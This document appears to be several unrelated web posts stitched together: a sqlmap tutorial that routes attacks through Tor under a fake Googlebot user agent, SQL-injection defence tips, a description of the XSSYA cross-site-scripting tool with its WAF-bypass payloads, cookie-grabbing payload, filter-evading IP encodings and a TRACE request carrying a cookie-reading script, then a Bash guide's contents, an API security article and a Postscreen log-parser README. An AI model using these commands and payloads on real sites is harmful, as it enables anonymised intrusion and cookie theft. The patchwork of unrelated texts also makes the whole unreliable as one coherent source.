Caution: if used in the wrong way, sqlmap generates many queries and can affect the performance of the target database; moreover, strange entries and changes to the database schema are possible if the tool is used extensively without control.


I will demonstrate how to use sqlmap with The Onion Router (Tor) to protect your IP, DNS, etc. On your Linux box, type in the terminal:

$ sudo apt-get install tor tor-geoipdb

Then enter the sqlmap folder and type:

./sqlmap.py -u "<target URL>" -b -a --tor --check-tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

The argument --tor invokes Tor, and --check-tor checks whether Tor is being used properly; if not, you will receive an error message in red in the terminal. The user agent is Googlebot’s, so all your requests to the site will look like a little visit from the Google bot.

With Tor in sqlmap, we can set a Tor proxy to hide the source from which the traffic or requests are generated.

--tor-port, --tor-type: these parameters let you set the Tor proxy manually.

--check-tor: this parameter checks whether the Tor setup is appropriate and functional.


Many targets have been exploited through SQL injection. A few years ago, when this threat was discovered, injection was done by hand: the pentester had to enter the codes manually, taking longer to complete the attack.

Then came programs that automated the attack. Nowadays perhaps the best known of these is sqlmap, an open-source testing framework written in Python. It has full support for the database systems MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB, and it supports six SQL injection techniques.


  1. Patch the SQL server regularly.
  2. Limit the use of dynamic queries.
  3. Escape user-supplied input.
  4. Store the database credentials in a separate file.
  5. Apply the principle of least privilege.
  6. Turn off magic quotes.
  7. Disable shell access.
  8. Disable any database features you do not need.
  9. Test your code.
  10. Search Google for advanced techniques to correct this vulnerability.
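Points 2 and 3 above are the heart of the matter: never concatenate raw user input into a query. A minimal shell sketch (the table and field names are made up) of whitelisting a numeric id before it ever touches the SQL string:

```shell
build_query() {
  # Accept only a positive integer id; reject everything else.
  case "$1" in
    *[!0-9]*|'') echo "rejected" ;;
    *) echo "SELECT title FROM news WHERE id = $1" ;;
  esac
}

build_query "7"          # → SELECT title FROM news WHERE id = 7
build_query "1 OR 1=1"   # → rejected (classic injection attempt)
```

In a real application you would go further and use the parameterized-query API of your language’s database driver, so the input is never spliced into the SQL text at all.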

XSSYA V-2.0 For Cross Site Scripting Vulnerability Confirmation Written In Python

XSSYA-V-2.0 (XSS Vulnerability Confirmation )

XSSYA is a Cross Site Scripting scanner and vulnerability confirmation tool that works in two methods:

• Method 1 confirms via request and response
• Method 2 confirms by executing an encoded payload and searching for the same payload, decoded, in the web page’s HTML code
• Supports HTTPS
• After confirmation, can execute a payload to get cookies
• Identifies 3 types of WAF (Mod_Security – WebKnight – F5 BIG IP)
• Can be run on Windows and Linux

XSSYA contains a library of encoded payloads to bypass WAFs (Web Application Firewalls). It also supports saving the web HTML code before executing the payload, and viewing the web HTML code on screen or in the terminal.

• What has changed? XSSYA v2.0 has more payloads: the library now contains 41 payloads to enhance the detection level. The XSS scanner has been removed from XSSYA to reduce false positives. URLs to be tested used to be disallowed from ending in any character except (/ – = – ?), but that limitation has now been removed.

• What’s new in XSSYA v2.0? Custom payloads: you have the ability to choose your own custom payload, and you can encode it with different types of encodings such as B64, HEX, URL-encode, or HEX with semicolons.

(HTML entities: single and double quotes only, brackets, AND/OR, or encode the whole payload with HTML entities.) This feature also supports the XSS vulnerability confirmation method: you choose your custom payload and custom encoding, execute it, and if the response is 200, check for the same payload decoded in the HTML code of the page.

• What’s new in XSSYA v2.0? HTML5 payloads: XSSYA v2.0 contains a library of 44 HTML5 payloads.

• What’s New in XSSYA V 2.0?

XSSYA has a library of the applications most vulnerable to XSS (cross-site scripting); this library currently covers Apache, WordPress and phpMyAdmin. If you choose the Apache application, it gives the CVE number, the version of Apache that is affected, and the link to the CVE for more details, so it is easy to search for a particular version affected by XSS.

• What’s new in XSSYA v2.0? XSSYA can convert the attacker’s IP address to hex, dword or octal notation to bypass any security mechanism or IPS that may exist on the target domain.
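That address-obfuscation trick is easy to reproduce by hand, since browsers accept an IPv4 address written as a single decimal (dword), hex or octal number. A small sketch (the address is just an example):

```shell
ip="192.168.1.1"   # example address

# Split into octets and pack them into a single 32-bit value.
IFS=. read -r a b c d <<EOF
$ip
EOF
dword=$(( (a << 24) | (b << 16) | (c << 8) | d ))

printf 'dword: %u\n' "$dword"        # http://3232235777/ == http://192.168.1.1/
printf 'hex:   0x%08X\n' "$dword"    # http://0xC0A80101/
printf 'octal: 0%o\n' "$dword"       # http://030052000401/
```

Filters that match on the dotted-quad form of an address will miss all three of these equivalent spellings.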

• What’s New in XSSYA V 2.0?

XSSYA also checks whether the target is vulnerable to XST (Cross Site Tracing): it sends a custom TRACE request and checks whether the target domain is vulnerable. The request will look like this:

TRACE / HTTP/1.0
Host: <target>
Header1: <script>alert(document.cookie);</script>

The modules that need to be downloaded are colorama 0.2.7 and gdshortener 0.0.2.

More information can be found at:

Advanced Bash-Scripting Guide – An in-depth exploration of the art of shell scripting


Mendel Cooper


10 Mar 2014

Revision History
Revision 6.5 05 Apr 2012 Revised by: mc
Revision 6.6 27 Nov 2012 Revised by: mc
Revision 10 10 Mar 2014 Revised by: mc
This tutorial assumes no previous knowledge of scripting or programming, yet progresses rapidly toward an intermediate/advanced level of instruction . . . all the while sneaking in little nuggets of UNIX® wisdom and lore. It serves as a textbook, a manual for self-study, and as a reference and source of knowledge on shell scripting techniques. The exercises and heavily-commented examples invite active reader participation, under the premise that the only way to really learn scripting is to write scripts.
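As a taste of what Chapter 2 (“Starting Off With a Sha-Bang”) covers, the smallest complete script is just an interpreter line plus commands. This sketch is mine, not an example from the book:

```shell
#!/bin/sh
# The "sha-bang" line above tells the kernel which interpreter should
# run this file -- the subject of Chapter 2 of the guide.
greeting="Hello from a shell script."
echo "$greeting"
```

Save it, `chmod +x` it, and run it with `./yourscript.sh`; everything else in the book builds on this skeleton.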

This book is suitable for classroom use as a general introduction to programming concepts.

This document is herewith granted to the Public Domain. No copyright!


For Anita, the source of all the magic

Table of Contents
Part 1. Introduction
1. Shell Programming!
2. Starting Off With a Sha-Bang
Part 2. Basics
3. Special Characters
4. Introduction to Variables and Parameters
5. Quoting
6. Exit and Exit Status
7. Tests
8. Operations and Related Topics
Part 3. Beyond the Basics
9. Another Look at Variables
10. Manipulating Variables
11. Loops and Branches
12. Command Substitution
13. Arithmetic Expansion
14. Recess Time
Part 4. Commands
15. Internal Commands and Builtins
16. External Filters, Programs and Commands
17. System and Administrative Commands
Part 5. Advanced Topics
18. Regular Expressions
19. Here Documents
20. I/O Redirection
21. Subshells
22. Restricted Shells
23. Process Substitution
24. Functions
25. Aliases
26. List Constructs
27. Arrays
28. Indirect References
29. /dev and /proc
30. Network Programming
31. Of Zeros and Nulls
32. Debugging
33. Options
34. Gotchas
35. Scripting With Style
36. Miscellany
37. Bash, versions 2, 3, and 4
38. Endnotes
38.1. Author’s Note
38.2. About the Author
38.3. Where to Go For Help
38.4. Tools Used to Produce This Book
38.5. Credits
38.6. Disclaimer
A. Contributed Scripts
B. Reference Cards
C. A Sed and Awk Micro-Primer
C.1. Sed
C.2. Awk
D. Parsing and Managing Pathnames
E. Exit Codes With Special Meanings
F. A Detailed Introduction to I/O and I/O Redirection
G. Command-Line Options
G.1. Standard Command-Line Options
G.2. Bash Command-Line Options
H. Important Files
I. Important System Directories
J. An Introduction to Programmable Completion
K. Localization
L. History Commands
M. Sample .bashrc and .bash_profile Files
N. Converting DOS Batch Files to Shell Scripts
O. Exercises
O.1. Analyzing Scripts
O.2. Writing Scripts
P. Revision History
Q. Download and Mirror Sites
R. To Do List
S. Copyright
T. ASCII Table
List of Examples
2-1. cleanup: A script to clean up log files in /var/log
2-2. cleanup: An improved clean-up script
2-3. cleanup: An enhanced and generalized version of above scripts.
3-1. Code blocks and I/O redirection
3-2. Saving the output of a code block to a file
3-3. Running a loop in the background
3-4. Backup of all files changed in last day
4-1. Variable assignment and substitution
4-2. Plain Variable Assignment
4-3. Variable Assignment, plain and fancy
4-4. Integer or string?
4-5. Positional Parameters
4-6. wh, whois domain name lookup
4-7. Using shift
5-1. Echoing Weird Variables
5-2. Escaped Characters
5-3. Detecting key-presses
6-1. exit / exit status
6-2. Negating a condition using !
7-1. What is truth?
7-2. Equivalence of test, /usr/bin/test, [ ], and /usr/bin/[
7-3. Arithmetic Tests using (( ))
7-4. Testing for broken links
7-5. Arithmetic and string comparisons
7-6. Testing whether a string is null
7-7. zmore
8-1. Greatest common divisor
8-2. Using Arithmetic Operations
8-3. Compound Condition Tests Using && and ||
8-4. Representation of numerical constants
8-5. C-style manipulation of variables
9-1. $IFS and whitespace
9-2. Timed Input
9-3. Once more, timed input
9-4. Timed read
9-5. Am I root?
9-6. arglist: Listing arguments with $* and $@
9-7. Inconsistent $* and $@ behavior
9-8. $* and $@ when $IFS is empty
9-9. Underscore variable
9-10. Using declare to type variables
9-11. Generating random numbers
9-12. Picking a random card from a deck
9-13. Brownian Motion Simulation
9-14. Random between values
9-15. Rolling a single die with RANDOM
9-16. Reseeding RANDOM
9-17. Pseudorandom numbers, using awk
10-1. Inserting a blank line between paragraphs in a text file
10-2. Generating an 8-character “random” string
10-3. Converting graphic file formats, with filename change
10-4. Converting streaming audio files to ogg
10-5. Emulating getopt
10-6. Alternate ways of extracting and locating substrings
10-7. Using parameter substitution and error messages
10-8. Parameter substitution and “usage” messages
10-9. Length of a variable
10-10. Pattern matching in parameter substitution
10-11. Renaming file extensions:
10-12. Using pattern matching to parse arbitrary strings
10-13. Matching patterns at prefix or suffix of string
11-1. Simple for loops
11-2. for loop with two parameters in each [list] element
11-3. Fileinfo: operating on a file list contained in a variable
11-4. Operating on a parameterized file list
11-5. Operating on files with a for loop
11-6. Missing in [list] in a for loop
11-7. Generating the [list] in a for loop with command substitution
11-8. A grep replacement for binary files
11-9. Listing all users on the system
11-10. Checking all the binaries in a directory for authorship
11-11. Listing the symbolic links in a directory
11-12. Symbolic links in a directory, saved to a file
11-13. A C-style for loop
11-14. Using efax in batch mode
11-15. Simple while loop
11-16. Another while loop
11-17. while loop with multiple conditions
11-18. C-style syntax in a while loop
11-19. until loop
11-20. Nested Loop
11-21. Effects of break and continue in a loop
11-22. Breaking out of multiple loop levels
11-23. Continuing at a higher loop level
11-24. Using continue N in an actual task
11-25. Using case
11-26. Creating menus using case
11-27. Using command substitution to generate the case variable
11-28. Simple string matching
11-29. Checking for alphabetic input
11-30. Creating menus using select
11-31. Creating menus using select in a function
12-1. Stupid script tricks
12-2. Generating a variable from a loop
12-3. Finding anagrams
15-1. A script that spawns multiple instances of itself
15-2. printf in action
15-3. Variable assignment, using read
15-4. What happens when read has no variable
15-5. Multi-line input to read
15-6. Detecting the arrow keys
15-7. Using read with file redirection
15-8. Problems reading from a pipe
15-9. Changing the current working directory
15-10. Letting let do arithmetic.
15-11. Showing the effect of eval
15-12. Using eval to select among variables
15-13. Echoing the command-line parameters
15-14. Forcing a log-off
15-15. A version of rot13
15-16. Using set with positional parameters
15-17. Reversing the positional parameters
15-18. Reassigning the positional parameters
15-19. “Unsetting” a variable
15-20. Using export to pass a variable to an embedded awk script
15-21. Using getopts to read the options/arguments passed to a script
15-22. “Including” a data file
15-23. A (useless) script that sources itself
15-24. Effects of exec
15-25. A script that exec’s itself
15-26. Waiting for a process to finish before proceeding
15-27. A script that kills itself
16-1. Using ls to create a table of contents for burning a CDR disk
16-2. Hello or Good-bye
16-3. Badname, eliminate file names in current directory containing bad characters and whitespace.
16-4. Deleting a file by its inode number
16-5. Logfile: Using xargs to monitor system log
16-6. Copying files in current directory to another
16-7. Killing processes by name
16-8. Word frequency analysis using xargs
16-9. Using expr
16-10. Using date
16-11. Date calculations
16-12. Word Frequency Analysis
16-13. Which files are scripts?
16-14. Generating 10-digit random numbers
16-15. Using tail to monitor the system log
16-16. Printing out the From lines in stored e-mail messages
16-17. Emulating grep in a script
16-18. Crossword puzzle solver
16-19. Looking up definitions in Webster’s 1913 Dictionary
16-20. Checking words in a list for validity
16-21. toupper: Transforms a file to all uppercase.
16-22. lowercase: Changes all filenames in working directory to lowercase.
16-23. du: DOS to UNIX text file conversion.
16-24. rot13: ultra-weak encryption.
16-25. Generating “Crypto-Quote” Puzzles
16-26. Formatted file listing.
16-27. Using column to format a directory listing
16-28. nl: A self-numbering script.
16-29. manview: Viewing formatted manpages
16-30. Using cpio to move a directory tree
16-31. Unpacking an rpm archive
16-32. Stripping comments from C program files
16-33. Exploring /usr/X11R6/bin
16-34. An “improved” strings command
16-35. Using cmp to compare two files within a script.
16-36. basename and dirname
16-37. A script that copies itself in sections
16-38. Checking file integrity
16-39. Uudecoding encoded files
16-40. Finding out where to report a spammer
16-41. Analyzing a spam domain
16-42. Getting a stock quote
16-43. Updating FC4
16-44. Using ssh
16-45. A script that mails itself
16-46. Generating prime numbers
16-47. Monthly Payment on a Mortgage
16-48. Base Conversion
16-49. Invoking bc using a here document
16-50. Calculating PI
16-51. Converting a decimal number to hexadecimal
16-52. Factoring
16-53. Calculating the hypotenuse of a triangle
16-54. Using seq to generate loop arguments
16-55. Letter Count
16-56. Using getopt to parse command-line options
16-57. A script that copies itself
16-58. Exercising dd
16-59. Capturing Keystrokes
16-60. Preparing a bootable SD card for the Raspberry Pi
16-61. Securely deleting a file
16-62. Filename generator
16-63. Converting meters to miles
16-64. Using m4
17-1. Setting a new password
17-2. Setting an erase character
17-3. secret password: Turning off terminal echoing
17-4. Keypress detection
17-5. Checking a remote server for identd
17-6. pidof helps kill a process
17-7. Checking a CD image
17-8. Creating a filesystem in a file
17-9. Adding a new hard drive
17-10. Using umask to hide an output file from prying eyes
17-11. Backlight: changes the brightness of the (laptop) screen backlight
17-12. killall, from /etc/rc.d/init.d
19-1. broadcast: Sends message to everyone logged in
19-2. dummyfile: Creates a 2-line dummy file
19-3. Multi-line message using cat
19-4. Multi-line message, with tabs suppressed
19-5. Here document with replaceable parameters
19-6. Upload a file pair to Sunsite incoming directory
19-7. Parameter substitution turned off
19-8. A script that generates another script
19-9. Here documents and functions
19-10. “Anonymous” Here Document
19-11. Commenting out a block of code
19-12. A self-documenting script
19-13. Prepending a line to a file
19-14. Parsing a mailbox
20-1. Redirecting stdin using exec
20-2. Redirecting stdout using exec
20-3. Redirecting both stdin and stdout in the same script with exec
20-4. Avoiding a subshell
20-5. Redirected while loop
20-6. Alternate form of redirected while loop
20-7. Redirected until loop
20-8. Redirected for loop
20-9. Redirected for loop (both stdin and stdout redirected)
20-10. Redirected if/then test
20-11. Data file for above examples
20-12. Logging events
21-1. Variable scope in a subshell
21-2. List User Profiles
21-3. Running parallel processes in subshells
22-1. Running a script in restricted mode
23-1. Code block redirection without forking
23-2. Redirecting the output of process substitution into a loop.
24-1. Simple functions
24-2. Function Taking Parameters
24-3. Functions and command-line args passed to the script
24-4. Passing an indirect reference to a function
24-5. Dereferencing a parameter passed to a function
24-6. Again, dereferencing a parameter passed to a function
24-7. Maximum of two numbers
24-8. Converting numbers to Roman numerals
24-9. Testing large return values in a function
24-10. Comparing two large integers
24-11. Real name from username
24-12. Local variable visibility
24-13. Demonstration of a simple recursive function
24-14. Another simple demonstration
24-15. Recursion, using a local variable
24-16. The Fibonacci Sequence
24-17. The Towers of Hanoi
25-1. Aliases within a script
25-2. unalias: Setting and unsetting an alias
26-1. Using an and list to test for command-line arguments
26-2. Another command-line arg test using an and list
26-3. Using or lists in combination with an and list
27-1. Simple array usage
27-2. Formatting a poem
27-3. Various array operations
27-4. String operations on arrays
27-5. Loading the contents of a script into an array
27-6. Some special properties of arrays
27-7. Of empty arrays and empty elements
27-8. Initializing arrays
27-9. Copying and concatenating arrays
27-10. More on concatenating arrays
27-11. The Bubble Sort
27-12. Embedded arrays and indirect references
27-13. The Sieve of Eratosthenes
27-14. The Sieve of Eratosthenes, Optimized
27-15. Emulating a push-down stack
27-16. Complex array application: Exploring a weird mathematical series
27-17. Simulating a two-dimensional array, then tilting it
28-1. Indirect Variable References
28-2. Passing an indirect reference to awk
29-1. Using /dev/tcp for troubleshooting
29-2. Playing music
29-3. Finding the process associated with a PID
29-4. On-line connect status
30-1. Print the server environment
30-2. IP addresses
31-1. Hiding the cookie jar
31-2. Setting up a swapfile using /dev/zero
31-3. Creating a ramdisk
32-1. A buggy script
32-2. Missing keyword
32-3. test24: another buggy script
32-4. Testing a condition with an assert
32-5. Trapping at exit
32-6. Cleaning up after Control-C
32-7. A Simple Implementation of a Progress Bar
32-8. Tracing a variable
32-9. Running multiple processes (on an SMP box)
34-1. Numerical and string comparison are not equivalent
34-2. Subshell Pitfalls
34-3. Piping the output of echo to a read
36-1. shell wrapper
36-2. A slightly more complex shell wrapper
36-3. A generic shell wrapper that writes to a logfile
36-4. A shell wrapper around an awk script
36-5. A shell wrapper around another awk script
36-6. Perl embedded in a Bash script
36-7. Bash and Perl scripts combined
36-8. Python embedded in a Bash script
36-9. A script that speaks
36-10. A (useless) script that recursively calls itself
36-11. A (useful) script that recursively calls itself
36-12. Another (useful) script that recursively calls itself
36-13. A “colorized” address database
36-14. Drawing a box
36-15. Echoing colored text
36-16. A “horserace” game
36-17. A Progress Bar
36-18. Return value trickery
36-19. Even more return value trickery
36-20. Passing and returning arrays
36-21. Fun with anagrams
36-22. Widgets invoked from a shell script
36-23. Test Suite
37-1. String expansion
37-2. Indirect variable references – the new way
37-3. Simple database application, using indirect variable referencing
37-4. Using arrays and other miscellaneous trickery to deal four random hands from a deck of cards
37-5. A simple address database
37-6. A somewhat more elaborate address database
37-7. Testing characters
37-8. Reading N characters
37-9. Using a here document to set a variable
37-10. Piping input to a read
37-11. Negative array indices
37-12. Negative parameter in string-extraction construct
A-1. mailformat: Formatting an e-mail message
A-2. rn: A simple-minded file renaming utility
A-3. blank-rename: Renames filenames containing blanks
A-4. encryptedpw: Uploading to an ftp site, using a locally encrypted password
A-5. copy-cd: Copying a data CD
A-6. Collatz series
A-7. days-between: Days between two dates
A-8. Making a dictionary
A-9. Soundex conversion
A-10. Game of Life
A-11. Data file for Game of Life
A-12. behead: Removing mail and news message headers
A-13. password: Generating random 8-character passwords
A-14. fifo: Making daily backups, using named pipes
A-15. Generating prime numbers using the modulo operator
A-16. tree: Displaying a directory tree
A-17. tree2: Alternate directory tree script
A-18. string functions: C-style string functions
A-19. Directory information
A-20. Library of hash functions
A-21. Colorizing text using hash functions
A-22. More on hash functions
A-23. Mounting USB keychain storage devices
A-24. Converting to HTML
A-25. Preserving weblogs
A-26. Protecting literal strings
A-27. Unprotecting literal strings
A-28. Spammer Identification
A-29. Spammer Hunt
A-30. Making wget easier to use
A-31. A podcasting script
A-32. Nightly backup to a firewire HD
A-33. An expanded cd command
A-34. A soundcard setup script
A-35. Locating split paragraphs in a text file
A-36. Insertion sort
A-37. Standard Deviation
A-38. A pad file generator for shareware authors
A-39. A man page editor
A-40. Petals Around the Rose
A-41. Quacky: a Perquackey-type word game
A-42. Nim
A-43. A command-line stopwatch
A-44. An all-purpose shell scripting homework assignment solution
A-45. The Knight’s Tour
A-46. Magic Squares
A-47. Fifteen Puzzle
A-48. The Towers of Hanoi, graphic version
A-49. The Towers of Hanoi, alternate graphic version
A-50. An alternate version of the script
A-51. The version of the example used in the Tab Expansion appendix
A-52. Cycling through all the possible color backgrounds
A-53. Morse Code Practice
A-54. Base64 encoding/decoding
A-55. Inserting text in a file using sed
A-56. The Gronsfeld Cipher
A-57. Bingo Number Generator
A-58. Basics Reviewed
A-59. Testing execution times of various commands
A-60. Associative arrays vs. conventional arrays (execution times)
C-1. Counting Letter Occurrences
J-1. Completion script for
M-1. Sample .bashrc file
M-2. .bash_profile file
N-2. Shell Script Conversion of VIEWDATA.BAT
T-1. A script that generates an ASCII table
T-2. Another ASCII table script
T-3. A third ASCII table script, using awk

Top 10 API Security Considerations

Top 10 API Security Considerations

Just released over at Axway, my new paper “Top 10 API Security Considerations”. Mark O’Neill and I did a webinar on this together, and now the paper is available (free reg required).

I see a lot of people rolling out APIs without a ton of thought given to the security fundamentals. This paper is designed to help you build a model that works to protect your APIs.

Here is a summary of the top 10 API security issues; you can read the paper for more examples.

1. Implement Model-Approach-Controller architecture

Information security is usually very focused on dealing with threats and vulnerabilities, and less aligned with architecture. A core principle of architecture is DRY (Don’t Repeat Yourself), which means that systems should be based on design patterns that allow for scalability and manageability.

2. Know and contain your assets

The basic mapping for access control is pretty simple. Subjects (like users and clients) request access to objects (like data, applications and services), and access controls mediate the decision to grant or deny access. However, this simple subject- request-object mapping quickly becomes complex when you factor in management considerations.
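The subject-request-object mapping above can be sketched minimally; the subjects, objects and policy table below are invented for illustration, not taken from the paper:

```python
# Minimal access-control mediation sketch: subjects request actions on
# objects, and a policy table grants or denies. All names are illustrative.
POLICY = {
    ("alice", "billing-api"): {"read"},
    ("bob", "billing-api"): {"read", "write"},
}

def mediate(subject, obj, action):
    """Grant access only if the (subject, object) pair allows the action."""
    return action in POLICY.get((subject, obj), set())

print(mediate("alice", "billing-api", "read"))   # True
print(mediate("alice", "billing-api", "write"))  # False
```

The management complexity the text mentions comes from keeping such a table correct as subjects and objects multiply.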

3. Design for malice

Most security architectures devote the lion’s share of attention and focus to access- control services that establish the rules of engagement for authenticating and authorizing users. But what about malicious actors that are focused on defeating the system? They often know the exact protocols of the access-control system and are deliberately trying to bypass it. Or, they are trying to exfiltrate data and other valuables from the enterprise.

4. Monitor for flaws — API attacks are happening

“You don’t know who’s swimming naked until the tide goes out.” — Warren Buffett

Mobile security gets a lot of attention, and rightly so. But look at where the attacks are happening — on the server side. Apple’s recent challenges with iCloud are a great example of this. Apple users endured high-profile breaches even though their data was generated on iPhones, stored on the iCloud server and protected by passwords. The attackers were able to crack those passwords by using a brute-force cryptanalytic attack (continuously guessing password possibilities). According to Apple CEO Tim Cook, “Apple could have done more to make people aware of the dangers of hackers trying to target their accounts or the importance of creating stronger and safer passwords.”

5. Think mobile and beyond

The mobile computing age is upon us — at this writing, there are more mobile users (1.8 billion) than web browser users. Security in the mobile age is at least as much about server-side API security as it is about securing mobile devices.

Delivering security to a wide proliferation of different kinds of clients is a daunting task. There are tens of thousands of variants to consider just in the Android ecosystem alone.

The real challenge is to define where and how to centralize security policy enforcement. If you have 18,000 different devices, you don’t have a controllable system; you have a zoo.

6. Think of sessions, not just APIs

Signing on to an API is one thing, but what about the second, third and nth call? Initial authentication differs from session authentication in that the latter is usually based on session keys. Session keys must be generated in such a way that they are not easily guessed; in practice, this means long and random identifiers. Session identifiers must be protected both in transit (for example, with TLS/SSL) and at rest, but securing a local sandbox for storing session identifiers is a major challenge today.
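For instance, a hard-to-guess session identifier can be generated with Python’s `secrets` module, which draws from the OS CSPRNG; the 32-byte length here is an illustrative choice:

```python
import secrets

def new_session_id():
    # 32 random bytes -> 256 bits of entropy, hex-encoded to 64 characters
    return secrets.token_hex(32)

sid = new_session_id()
print(len(sid))  # 64
```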

In addition, the API session is usually a “midstream” session. Consider a mobile application where a session is running on the client device, another is running between the client and the API gateway, and at least one more is running between the API gateway and the back end. Even in this simple example, at least three sessions fire up when the user presses thumb to glass.

7. Simplify user experience

Users don’t care about the details of identity and security protocols; they just want to use the system. Unfortunately, the security industry has historically placed users at the center of the security protocol, and asked them to make intelligent (and technical) risk- based decisions by answering questions like, “Do you trust this certificate?”

8. Simplify the developer experience

Developers are users, too. API providers can unwittingly create vulnerabilities by not arming developers with sufficient knowledge. For example, a developer may hit an API too many times and degrade performance. Or a developer may not know why or how to protect API and session keys. These problems can result in Denial of Service, Privilege Escalation and other security issues.

9. Appoint an API curator

This Top 10 list is primarily focused on technology, but even in the age of machines, we humans still play an important role (for at least a few more years, anyway). As much as tech matters, it’s important to get the organizational side right, too — just publishing APIs in a haphazard manner leads to chaos. Organizations need a gatekeeper who can ensure that policies and processes have been followed before exposing the API (and all the data and functionality behind it) to the outside world.

10. Be bi-directional: Notifications, WebSockets, SMS

Access-control paradigms are changing. Client/server communications mainly follow Request-Response models, but with mobile, multi-factor authentication and HTML5, we are starting to see wholly new protocols in use.


In honor of Spinal Tap, we took this top ten list to eleven; read the paper for the eleventh issue, full descriptions and examples.

Postscreen-Stats – A simple script to parse Postscreen logs

Postscreen Statistics Parser

Simple script to compute some statistics on Postfix/Postscreen activity. Run it against your Postfix syslogs.

Published under GPL v2

    parses postfix logs to compute statistics on postscreen activity

usage: -f mail.log

  -a|--action=   action filter with operators | and &
                      ex. 'PREGREET&DNSBL|HANGUP' = ((PREGREET and DNSBL) or HANGUP)
                      ex. 'HANGUP&DNSBL|PREGREET&DNSBL' 
                          = ((HANGUP and DNSBL) or (PREGREET and DNSBL)

  -f|--file=     log file to parse (default to /var/log/maillog)

  -g            /!\ slow ! ip geoloc against (default disabled)

  --geofile=    path to a maxmind geolitecity.dat. if specified, with the -g switch
                the script uses the maxmind data instead of (faster)

  -G            when using --geofile, use the pygeoip module instead of the GeoIP module

  -i|--ip=      filters the results on a specific IP

  --mapdest=    path to a destination HTML file that will display a Google Map of the result
                  /!\ Require the geolocation, preferably with --geofile

  --map-min-conn=   When creating a map, only map the IPs that have connected X number of times

  -r|--report=  report mode {short|full|ip|none} (default to short)

  -y|--year=    select the year of the logs (default to current year)

  --rfc3339     to set the timestamp type to "2012-04-13T08:53:00+02:00" instead of the regular syslog format "Oct 23 04:02:17"

example: $ ./ -f maillog.3 -r short -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Julien Vehent (!j) -
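The `-a` action-filter semantics shown in the usage above (`|` binding looser than `&`) can be sketched as follows; this is an illustration of the documented behavior, not the script’s actual parser:

```python
def match_actions(filter_expr, actions):
    """Evaluate an action filter like 'PREGREET&DNSBL|HANGUP' against the
    set of actions seen for a client: '|' separates alternatives, each of
    which is an '&'-joined conjunction, per the usage examples above."""
    return any(
        all(term in actions for term in clause.split("&"))
        for clause in filter_expr.split("|")
    )

print(match_actions("PREGREET&DNSBL|HANGUP", {"HANGUP"}))            # True
print(match_actions("PREGREET&DNSBL|HANGUP", {"PREGREET"}))          # False
print(match_actions("PREGREET&DNSBL|HANGUP", {"PREGREET", "DNSBL"})) # True
```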

Basic usage

Generate a report from a syslog postfix log file. If you are parsing logs from a year that is not the current year, use the -y option to specify the year of the logs.

$ python -f maillog.1 -r short -y 2011
=== unique clients/total postscreen actions ===
2131/11010 CONNECT
463/536 DNSBL
305/503 HANGUP
1884/2258 NOQUEUE 450 deep protocol test reconnection
1/42 NOQUEUE too many connections
1577/1600 PASS NEW
866/8391 PASS OLD
181/239 PREGREET

=== clients statistics ===
4 avg. dnsbl rank
505 blocked clients
2131 clients
840 reconnections
32245.4285714 seconds avg. reco. delay

=== First reconnection delay (graylist) ===
delay| <10s   |>10to30s| >30to1m| >1to5m | >5to30m|>30mto2h| >2hto5h|>5hto12h|>12to24h| >24h   |
count|12      |21      |21      |196     |261     |88      |40      |29      |53      |119     |
   % |1.4     |2.5     |2.5     |23      |31      |10      |4.8     |3.5     |6.3     |14      |
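The delay buckets in the histogram above can be sketched as a simple bucketing routine; the bucket edges in seconds are taken from the report header, the sample delays are illustrative:

```python
# Bucket edges in seconds: <10s, 10-30s, 30s-1m, 1-5m, 5-30m, 30m-2h,
# 2h-5h, 5h-12h, 12h-24h, >24h
EDGES = [10, 30, 60, 300, 1800, 7200, 18000, 43200, 86400]

def bucket(delay_seconds):
    for i, edge in enumerate(EDGES):
        if delay_seconds < edge:
            return i
    return len(EDGES)  # >24h

counts = [0] * (len(EDGES) + 1)
for d in (5, 45, 200, 90000):  # illustrative reconnection delays
    counts[bucket(d)] += 1
print(counts)  # [1, 0, 1, 1, 0, 0, 0, 0, 0, 1]
```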

Get the statistics for a specific IP only

$ python -f maillog.1 -r ip -i
Filtering results to match:
    connections count: 2
    first seen on 2011-10-22 09:37:54
    last seen on 2011-10-22 09:38:00
    DNSBL count: 1
    DNSBL ranks: ['6']
    HANGUP count: 2

Geo Localisation of blocked IPs

There are 3 GeoIP modes:

  1. Use the online geoip service. This is free but slow and not very accurate
  2. Use Maxmind’s GeoIP database via the GeoIP python module. You can use either the free version of the DB from their website, or get a paid version.
  3. Use Maxmind’s GeoIP database via the pygeoip module (the -G switch)

To use the online service, just set the -g option. To use Maxmind, set --geofile to point to your Maxmind DB (ie. --geofile=/path/to/GeoIPCity.dat). By default, geofile uses the GeoIP python module, but if you prefer to use pygeoip instead, set the -G option as well.

$ ./ -r short --geofile=../geoip/GeoIPCity.dat -G -f maillog.3 -y 2011


=== Top 20 Countries of Blocked Clients ===
 167 (33.00%) United States
  59 (12.00%) India
  33 ( 6.50%) Russian Federation
  26 ( 5.10%) Indonesia
  23 ( 4.60%) Pakistan
  21 ( 4.20%) Vietnam
  20 ( 4.00%) China
  13 ( 2.60%) Brazil
  11 ( 2.20%) Korea, Republic of
   9 ( 1.80%) Belarus
   8 ( 1.60%) Turkey
   7 ( 1.40%) Iran, Islamic Republic of
   7 ( 1.40%) Ukraine
   6 ( 1.20%) Kazakstan
   6 ( 1.20%) Chile
   5 ( 0.99%) Italy
   5 ( 0.99%) Romania
   4 ( 0.79%) Poland
   4 ( 0.79%) Spain
   3 ( 0.59%) Afghanistan

Geo IP database installation

Using the MaxMind free database:

  1. Download the database and extract GeoLiteCity.dat at the location of your choice
  2. Install the GeoIP maxmind package: # aptitude install python-geoip
  3. Launch postscreen_stats with --geofile="/path/to/geolitecity.dat"

Google Map of the blocked IPs

You can use the --mapdest option to create an HTML file with a map of the blocked IPs.

$ ./ -f maillog.3 -r none -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Google map will be generated at postscreen_report_2012-01-15.html
using MaxMind GeoIP database from ../geoip/GeoIPCity.dat
Creating HTML map at postscreen_report_2012-01-15.html

If you have a lot of IPs to map, you can use --map-min-conn to only map IPs that connected at least X times.

./ -f maillog.3 -y 2011 -g --geofile=../geoip/GeoIPCity.dat -G --mapdest=testmap.html --map-min-conn=5
